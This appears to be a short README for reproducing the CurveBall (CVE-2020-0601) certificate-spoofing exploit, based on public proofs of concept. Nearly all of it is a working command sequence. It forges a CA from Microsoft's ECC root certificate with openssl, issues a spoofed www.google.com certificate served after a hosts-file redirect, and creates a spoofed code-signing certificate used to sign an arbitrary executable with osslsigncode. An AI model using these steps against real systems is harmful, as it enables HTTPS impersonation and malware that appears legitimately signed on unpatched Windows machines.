Based on POC's https://github.com/ly4k/CurveBall
https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/
python version 3.11 openssl version 3.1 osslsigncode version 2.5 python libraries in gen-key.py httpServer.py
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req
python httpServer.py
Add <kali.machine.ip> www.google.com to the hosts file (redirects google to the server)
visit HTTPS://www.google.com
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12
osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe